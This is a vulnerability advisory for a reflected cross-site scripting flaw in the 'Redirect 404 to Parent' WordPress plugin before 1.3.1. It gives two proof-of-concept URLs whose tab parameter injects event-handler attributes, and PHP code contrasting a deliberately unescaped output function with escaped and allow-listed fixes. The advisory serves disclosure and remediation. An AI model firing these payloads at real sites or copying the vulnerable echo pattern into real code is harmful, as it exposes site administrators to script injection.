WordPress Plugin Vulnerabilities
Redirect 404 to Parent < 1.3.1 - Reflected Cross-Site Scripting (XSS)
Description
The plugin's settings page did not properly sanitise the tab parameter before outputting it back in the response, leading to a reflected Cross-Site Scripting (XSS) issue.
Proof of Concept
https://example.com/wp-admin/options-general.php?page=moove-redirect-settings&tab=" onMouseOver="alert(1);
https://example.com/wp-admin/options-general.php?page=moove-redirect-settings&tab="+style%3D"animation-name%3Aspinner"+onanimationstart%3D"alert(%2FXSS%2F)
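Both PoC values start with a double quote, which implies the tab value was echoed into a double-quoted HTML attribute. The PHP below is an added illustration of that pattern next to a hardened form; it is not the plugin's code, and the function names, tab slugs and the input element are assumptions.

```php
<?php
// Added illustration, not the plugin's code. Function names, tab slugs and the
// <input> element are hypothetical; only the PoC value comes from this page.

// Vulnerable pattern: the request value is echoed into the attribute as-is.
function render_tab_field_vulnerable(string $tab): string {
    return '<input type="hidden" name="tab" value="' . $tab . '">';
}

// Output escaping only: quotes become entities, so the value stays in the attribute.
// In WordPress code the equivalent output helper is esc_attr().
function render_tab_field_escaped(string $tab): string {
    $safe = htmlspecialchars($tab, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="tab" value="' . $safe . '">';
}

// Allow-list plus escaping: unknown tab values never reach the markup at all.
function render_tab_field_hardened(string $tab): string {
    $allowed = ['general', 'advanced'];        // hypothetical tab slugs
    if (!in_array($tab, $allowed, true)) {
        $tab = $allowed[0];                    // fall back to the default tab
    }
    return render_tab_field_escaped($tab);
}

// List the attribute names an HTML parser sees on the rendered element.
function attribute_names(string $html): array {
    $doc = new DOMDocument();
    @$doc->loadHTML($html, LIBXML_NOERROR | LIBXML_NOWARNING);
    $names = [];
    foreach ($doc->getElementsByTagName('input')->item(0)->attributes as $attr) {
        $names[] = $attr->name;
    }
    return $names;
}

// Decoded tab value from the first PoC URL on this page.
$poc = '" onMouseOver="alert(1);';
$rendered = [
    'vulnerable' => render_tab_field_vulnerable($poc),
    'escaped'    => render_tab_field_escaped($poc),
    'hardened'   => render_tab_field_hardened($poc),
];
foreach ($rendered as $label => $html) {
    printf("%-11s %s\n  attributes: %s\n", $label, $html,
        implode(', ', attribute_names($html)));
}
```

An event-handler attribute in the parsed attribute list means the value escaped its attribute; the same check can be used as a regression test after patching.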
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
0xB9
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-04-23 (about 3 years ago)
Added
2021-04-23 (about 3 years ago)
Last Updated
2021-04-24 (about 3 years ago)